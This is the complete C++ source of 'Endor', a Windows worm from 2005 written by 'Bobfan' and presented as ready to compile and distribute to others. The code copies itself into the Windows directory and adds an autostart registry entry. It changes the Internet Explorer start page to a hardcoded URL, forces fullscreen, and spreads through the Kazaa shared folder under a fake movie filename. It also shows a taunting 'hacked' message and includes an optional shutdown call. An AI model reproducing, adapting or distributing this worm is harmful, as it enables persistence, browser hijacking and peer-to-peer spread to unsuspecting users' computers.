endor.cpp

/*================================================= =============== Endor-Worm by Bobfan Version 1.1 30/05/05

################ The Script Kiddie Foundation ##### #################################### presents: ############## ############ WIN32.ENDOR - A fresh Computer-Worm #### Written in C++ by Bobfan ##################################################### ############################################################# ########### ## Hey wussup? ## This is Endor, a Worm written in C++... ## If you wanna build up ur own this is the right pa ckage! ## Do whatever u wanna do! ## ## PeazZ, Bobfan ## #################################################### ########################## Instructions to compile: ######### ########### ## Instructions to compile (C++ Builder): ## Extract cbuilder_src.zip ## Open up endor.bpr into Borland C++ Builder ## Compile&build it! ## Now send this compiled file to all the kiddies ou t there! ## ## Instructions to compile (DevC++): ## Extract devcpp_src.zip ## Open up endor.dev into DevC++ ## Compile it ## Now send this compiled file to all the kiddies ou t there! ## #################################################### ################################# Features: ################# ########### # # Features: ## Autostart in Registry ## Change Internet Explorer's URL ## Drop copies of itself into the Windows-Directory ## Sets Internet-Explorer to Fullscreen ## Spread it into Kazaa-Network ## Shutdown the Computer (disabled but you can enabl e it ## by changing the source code) #################################################### ################################### License ################# ########### ## Feel free to do whatevery you want with it! ## Released by Script Kiddie Foundation ## Project is (c) 2005 by SKF ## "Our hobby is your computer's end" :-P ## #################################################### #################################### Thanks ################# ########### ## Big thanks to: Retro, Gandro, Amok-One, Sebi, ## Commodore-Freak, Joe, Reaper, OSBetaArchive, Winh istory ## and many more! #################################################### #################################### Bobfan ################# ##########

=================================================== ===============*/

endor.cpp

// Include headers#include <windows.h>#include <string.h>#include <fstream>

// Define the new Registry Values

unsigned char reg [ 40] = "http://www.stringtangafun.de/index.php" ; // New Start-URL of IE

unsigned char reg1 [ 4] = "yes" ; // Fullscreen IE

// unsigned char reg2[10] = ""; // Not Used

// Define windirchar windir [ MAX_PATH];

// Begin of Main-Codeint APIENTRY WinMain ( HINSTANCE hInstance , HINSTANCE hPrevInstance , LPSTR lpCmdLine , intnCmdShow){

// Get the Windows Directory and Registrychar pathname [ 256 ];GetWindowsDirectory ( windir , sizeof ( windir ));HMODULE hMe= GetModuleHandle ( NULL);DWORD nRet= GetModuleFileName ( hMe, pathname , 256 );HKEY hKey;

// Copy the worm to c:\windows\win.exestrcat ( windir , "\\win.exe" );CopyFile ( pathname , windir , 0);

// Register Endor in the RegistryRegCreateKey ( HKEY_CURRENT_USER, "Software\\Bobfan" , & hKey);RegSetValueEx ( hKey , "Endor" , 0, REG_SZ, ( LPBYTE) windir , sizeof ( windir ));

// Change Start Page of the Internet ExplorerRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main" ,& hKey);RegSetValueEx ( hKey , "Start Page" , 0, REG_SZ, reg , sizeof ( reg ));RegCloseKey ( hKey);

// Change Internet Explorer to FullscreenRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main" ,& hKey);RegSetValueEx ( hKey , "FullScreen" , 0, REG_SZ, reg1 , sizeof ( reg1 ));RegCloseKey ( hKey);

// Not Used Registry Hack// RegCreateKey (HKEY_CURRENT_USER, "Not used",&hKe y);// RegSetValueEx (hKey,"Nothing", 0, REG_SZ, reg2, sizeof(reg2));// RegCloseKey(hKey);

//Show a Message-BoxMessageBox ( 0, "This Computer has been hacked by SKF... Man, you s houldn't trust every

program you run!\nThank you for your support you du mbass n00b!\n\nKnowledge is power, but not everybody has the power!" , "Endor 1.1" , MB_ICONEXCLAMATION| MB_OK);

// Autostart EndorRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run" , & hKey);RegSetValueEx ( hKey , "Endor" , 0, REG_SZ, ( LPBYTE) windir , sizeof ( windir ));

// Copy the worm to Kazaa's Shared Folder to spread on the NetworkCopyFile ( pathname , "C:\\My Shared Folder\\starwars-episode3_full_rippe d_by_antrax.avi.exe" ,

endor.cpp

0);

// Reboot the Computer (Remove the // before the ne xt line to enable it)// InitiateSystemShutdown(0, 0, 0, TRUE, FALSE);

return 0; // Exit the Application}